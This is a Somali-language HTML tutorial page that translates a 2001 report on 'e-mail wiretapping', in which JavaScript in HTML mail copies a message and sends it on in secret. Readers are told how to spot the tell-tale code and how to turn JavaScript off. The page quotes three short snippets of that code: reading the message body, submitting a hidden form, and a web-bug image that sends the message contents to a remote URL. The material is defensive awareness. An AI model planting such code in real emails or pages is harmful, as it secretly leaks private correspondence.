Casharrada HTML

Casharka: Bilow | Tusmo | Hordhac | NotePad | 01 | 02 | 03 | 04 | 05 | 06 | 07 | 08 | 09 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 |

Qore: Maxamed Cali | Taariikh: Daabacaddii 1999/2000


DIGNIIN: Emailka oo laxiriirsanayo lagana xadayo akhbaarta aadka xasaasiga u ah
Tarjume: Maxamed Cali Aaden

March 9, 2001

Cilmibaaris kusaabsan isgaarsiinta casrigan oo ay samaysay qaybta Privacy Foundation ee jaamacada Denver [University of Denver] waxa ay dadweynaha adduunka ku baraarujinayaan sida ay khatar u tahay in laxiriirsankaro akhbaaraadka la isku weydaarsado emailka taas oo la akhrisankaro waraka ama akhbaarta xasaasiga ah iyada oo qofkii lahaa uusan ka warqabin.

Cilmibaaristu waxa ay cadaysay khatarta ah in:

  • Khadka emailka laxadikaro ama laxiriirsankaro, taas oo markaas la ogaankaro halka ay akhbaartaasi kusocoto ama jidka emailka
  • Marka laba shirkadood arrin ganacsi kawada xaajoonayaan iyagoo email isudiraya, waxaa suurta gal ah in akhbaartii ay isweydaarsadeen lagaxiriirsankaro (xadikaro) qalabka emailka uu midkood adeegsanayo, halkaasna lagu ogaankaro akhbaartoodii oo dhan
  • Email sumaysan [bugged e-mail] waxay qabankartaa akhbaarta kumayaal email.
  • Shirkado ayaaba lagayaaba in ay ku shaqaysataan arintaan

Tani waxay khatarweyn kutahay shirkadaha  (iyo dadka) akhbaarta isku dhaafsada emailka. Waxaa dhici karta in shirkad madaxeedu uu email kula xiriiro madaxa shirkada kale oo markaas ay isweydaarsadaan akhbaar xasaasi ah. Hadii markaas uu jiro waxa loogu yeero "e-mail wiretap" oo ah in emailka asalka akhbaarta lagasoo diray ay ku xiriirsantahay qalab awood u leh helida akhbaarta, markaas marwalba oo email laga diro emailka qofkii emeilku kusaocdey, waxaa nuqul ama 'copy' emailkaas  ah ay si qarsoodi ah ugu tegeysaa emailkii asalka ahaa (ama meel loo qoondeeyey).

Sida kucad techrepublic.com, dhibaatadan emailka la xiriirsanayo waxay sigaar ah saamayn ugu leedahay barnaamijyada emailaada ee adeegsada HTML [HTML-enabled e-mail] kuwaas oo weliba ogol waxa loogu yeero JavaScript oo furan, waxaana kuwaas kamida  "Microsoft Outlook, Outlook Express, iyo Netscape Communicator 6." laakiin Eudora iyo AOL 6.0 arintaasi ma saamayneyso, sidoo kale arintaan ma saamayneyso Yahoo iyo Hotmail, sida ay sheegeen  techrepublic.

Sidee ku ogaankartaa in emailkaaga la xiriirsaday

Arintaan emailka la xiriirsanayo waxaa la ogaa ilaa sannadkii 1998, markaas oo Engineer kambuyuutarada ah ee jaamacada Washington  [University of washington] uu muujiyey cillada Microsoft ee laxiriirta arintan, taas oo aan ilaa hadda laxallin sida ay sheegeen TechRepublic.

Hadaba waxaa haboon in aad dib u jalleecdid emailadii aad dirtay ilaa 1998 iyo kuwa aad heshay, gaar ahaan kuwo leh waxa loogu yeero "Forward" taas oo noqonkarta email kuxiriirsan qalab meelfog yaal.

Si aad u ogaatid in emailkaagu uu arintaan halis u ayahay, marka hore fur dhambaal ama emailka, kaddibna eeg xeerka ama "source code" tan oo ay barnaamijyada emailadu ku kalagedisanyihiin, haddii ay arintani kugu adkaato in aad aragtid "source code" markaas fiiri qaybta "help" ee barnaamijka aad adeegsaneysid.

Hadaba  qaybta "Source Code" waxaad ka eegeysaa in uu ka qoranyahay xeerka hoose:

"contents + document.body.innerHTML;"

Xeerkaasi waa kan sahlaya in JavaScript ay akhrinkarto emailkaaga. Kaddib waxaad eegtaa xeerka hoos kuqoran:


"document.hiddenForm.message.value = contents;
document.hiddenForm.submit();
"

Xeerkaana waa kan sahlaya in emailkaaga la xiriirsankaro ama adiga oo aan ogeyn ay u dirmeyso meeshii laga hagayey. Haddii aan Browserkaagu kuu digin, markaas akhbaartaadii waxaa lagayaabaa in laxiriirsanayo.

Ugu dambayn fiiri xeerka hoose:

 

"webBug = new Image();
webBug.src = baseURL + "?message=" + escape(contents);
"
 

Xeerkaan kore oo looyaqaan webbug waa kan awooda u siinaya in akhbaartii laxiriirsado iyada oo aadan ogeyna si qarsoodi ah loo helo. Taas oo qoraalada laguteyo emailka ka dhigeysa kuwo aan la hubin meesha ay marayaan iyo khadka ay sii marayaan in uu yahay mid aamin ah iyo inkale.

Sidee looga hortigi karaa in la xiriirsado emailka

Si qayb kamida dhibka arintaan loo xaliyo waa in lagadhigo JavaScript mid xiran ama OFF. Si taas loo sameeyeno waxaa laraacikaraa qaabka kusharaxan bogga www.privacyfoundation.org kaas oo muujinayaa qaabka saddexda barnaamin ee hoos ku qoran:

  • Outlook 2000
  • Outlook Express 5
  • Netscape Messenger 6

Waxaa kale oo jira in Outlook uu leeyahay barnaamin dawo ah oo laxiira barnaaminkaas oo laga helikaro microsoft.com.

Laakiin sidakucad techrepublic, arintaan ah in la xiro JavaScript [OFF] ma xallineyso dhibaatadii oo dhan, waxaana dhici karta in haddii email loo diri qof iyada oo la adeegsanayo "forward' isla mar ahaantaana uu qofkaasi barnaaminka uu adeegsanayaa aysan JavaScript-tigiisu ahayn mid xiran [off] markaas dhibkii halkii ayuu marlabaad kabilaabanayaa waayo xeerkii adeegsanayey xiriirirnta ayaa markiiba soo labakaclaynaya.

Warbixintan oo fahfaahsan kuna qoran af Ingiriis ka akhri www.privacyfoundation.org

Source:

www.techrepublic.com 

www.privacyfoundation.org

Ma Ogtahay in la ogaan karo Wadanka aad joogtid marka aad Qof u dirto Email….?!!! 

 

..


Qore::: Eng. Maxamed Cali Aaden
Qoraalkan waxaan qoray 1999
Waxaan xilligaas joogey: London, Ontario, Canada
Wixii suaalo ah waxaa lagu soo hagaajin karaa
Email: aqoonkaal @ gmail.com

Tusmada Casharrada HTML

Bilow | Tusmo | Hordhac | NotePad | 01 | 02 | 03 | 04 | 05 | 06 | 07 | 08 | 09 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 |